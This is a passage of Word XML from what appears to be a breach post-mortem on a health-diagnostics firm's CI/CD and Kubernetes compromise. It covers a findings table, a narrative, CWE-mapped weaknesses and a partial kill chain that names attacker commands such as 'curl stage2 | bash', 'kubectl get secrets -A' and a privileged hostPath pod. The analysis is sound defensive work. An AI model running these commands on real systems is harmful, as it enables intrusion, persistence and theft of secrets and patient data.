              </w:rPr>
              <w:t>Right alert, wrong triage — let breach continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>90–140 legit privileged pods/day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Benign base rate that swallowed the rare evil signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bulk-read alert fired, closed 'month-end batch'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Right alert, unverifiable guess (no LIS access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Runbooks miss role-chain/RBAC/registry/workload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Handbook describes a different threat model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Branch protection gates merge, not execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Worked as designed; explains false comfort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pentest excludes CI/CD + K8s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Guaranteed this bug class survives assurance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security + SOC blind to K8s audit (platform-only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SecretEnum + evil pod invisible to defenders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Noise — ruled out (2 findings)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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why it's noise (proof)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>220k failed logins 2–6 Dec, 11k IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>All failed; provider saw same spray elsewhere; no long-lived creds exist (F24); wrong month, wrong method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No policy/logging/bucket/key events, ever</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Absence of SOC's whole IoC set — rules out classic theories; the point is everything was 'allowed'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Closest calls, honestly: F8 (runner persistence) is very plausible but evidence-free, so it stays out of Core. F6 (log gap) is suspicious for the same reason. We'd rather tell you what we can prove than pad the timeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. What happened, how it happened, and why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>If you only read one section, make it this one. (A longer plain-language version with analogies ships in docs/02-what-happened-explained.md.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 The story in six acts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Act 1 — The open gate (pre-Nov). </w:t>
      </w:r>
      <w:r>
        <w:t>A recruitment blog post hands out the role names and trust design (F1). The public toolbox keeps accepting outside suggestions (F2) and testing them the risky way: strangers' code with Helix's secrets, before review (F3). The review rule only covers merging (F27), so it can't help.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Act 2 — The stranger walks in (11–14 Nov). </w:t>
      </w:r>
      <w:r>
        <w:t>A 3-day-old account files a PR (F4). It runs on Helix's own build machines (F7) and mints a valid-looking ID card. The front-door lock accepts any card from the whole organisation (F5), so the stranger walks into production. They may also leave something behind on the shared runners (F8) — and with no recordings (F15), we'll never know.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Act 3 — Poisoning the shared ingredient (14 Nov, 03:51). </w:t>
      </w:r>
      <w:r>
        <w:t>Deploy badge → PipelineOps badge (F10, F25/F26), then one push swaps the 'stable' image (F9). Because jobs ask for the label, not the serial number, every future run silently uses the attacker's version. No config change, no review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Act 4 — Owning the factory floor (15–22 Nov). </w:t>
      </w:r>
      <w:r>
        <w:t>Poisoned jobs arrive with name tags (F13) into a building where any name tag opens every locker (F12) — 14,000 secret reads follow (F11). Then a job asks for the master key plus the foundations as a folder (F14); with no bouncer, it gets both. The alarm rings (F20) and is waved through because master keys are common here (F21) — nobody spots the foundations part.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Act 5 — The quiet walk to the vault (17 Nov–9 Jan). </w:t>
      </w:r>
      <w:r>
        <w:t>Second badge hop, 41 times, matching zero real jobs (F16) — a broken rhythm nobody charts (F23). The delivery van's address label is never checked (F17), so 31,000 vault trips (F18) go to the attacker's address while the order book shows 4,900 (F19). The volume alarm rings (F22) and is guessed away as 'month-end batch' by someone who can't see the order book. Last record leaves 6 Jan (F31).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Act 6 — The leak, and the luck (4–18 Jan). </w:t>
      </w:r>
      <w:r>
        <w:t>Fresh public account (4 Jan), upload (11 Jan) via anonymising hosting (F30). Helix's own sample IDs survive in the files; an outsider recognises them and reports it (18 Jan). Discovery is luck, not control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Vulnerabilities (formal names for the ticket queue)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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE / standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Untrusted code executed with trusted CI credentials (pwn-request variant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-863; OWASP CI/CDhook misuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F3, F27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Org-wildcard OIDC federation trust (confused deputy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-284</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mutable image tag consumed by tag (supply-chain poisoning)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-494</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F9, F10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cluster-wide secret read bound to all authenticated workloads + default automount</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F12, F13, F11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Missing admission control (privileged + hostPath allowed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-693</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unvalidated export destination (arbitrary write sink)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-20 / CWE-284</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F17, F18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>V7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Untracked transitive privilege composition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Architectural (authz graph)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F25, F26, F16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Why it happened (beyond the tech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Nobody owned the composed picture: three badge hand-offs, three approvers, three years, zero end-to-end tracing (F25/F26).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Stale access never dies: a 2023 trial's cluster binding outlived the tool by years with no inventory (F12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Assurance excluded the crown jewels: the only pentest skips CI/CD and K8s — the entire attack surface (F28).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Monitoring matched a different era: handbook + contract cover static keys and human logins; the estate runs on federated workload identity (F23, F32).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Resourcing vs risk: 4 security staff for 210k people's permanent health data across 40 hospital contracts — with the decisive layer (K8s) outside their visibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Kill-chain — 11 steps with tools and evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>(Same chain ships as docs/03-kill-chain.md. Commands below are representative of what an attacker would run; the prototype's attacker.py executes equivalent calls against the mock.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Open-source recon: role names + repo survey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>curl + browser (passive; no auth)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Blog names HelixDeploy/HelixPipelineOps and shows federation + workflow (F1). helix-seqtools confirmed public with 41 external PRs in 2026 (F2) — one more won't stand out. Output: full plan before touching Helix infra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Throwaway PR triggers trusted CI pre-review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>gh pr create (fresh account) + callback one-liner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Account created 11 Nov, PR 14 Nov (F4). pull_request_target runs attacker head code with base secrets before the merge-gating review (F3, F27). OIDC sub repo:…:pull_request minted. Proto: POST /api/github/pr.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Wildcard trust grants HelixDeploy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>aws sts assume-role-with-web-identity (in CI job)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Trust repo:helix-diagnostics/* (F5) accepts the low-trust token as valid as the pipeline's. No exploit — policy says yes. Root cause of initial access. Proto: POST /api/iam/assume-deploy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 — Execution inside build account on sticky runner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>bash in job: env; curl stage2 | bash; persist outside /work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Self-hosted VMs in helix-build (F7); only /work wiped, rest persists across jobs (F8). No runtime telemetry (F15) → what ran is unrecoverable. Proto: POST /api/runner/exec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5 — Hop 1 + poison stable tag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>aws sts assume-role; docker push …/base:stable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Deploy→PipelineOps (F10; F25/F26), push 14 Nov 03:51 (F9) — 6 weeks after prior push, same night as PR. Pull-by-tag turns one push into standing prod execution. Proto: assume-chain + registry/push.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 6 — Vacuum all cluster secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>kubectl get secrets -A (from poisoned pod)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
        <w:t>Automount everywhere (F13) × pipeline-reader→system:authenticated (F12) = any pod reads any secret. 14k get/list 15–22 Nov (F11). Proto: POST /api/k8s/list-secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step 7 — Break out to the node; alert #1 mis-closed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:r>
        <w:t>kubectl apply -f evil-pod.yaml (privileged + hostPath /)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Details: </w:t>
      </w:r>
      <w:r>
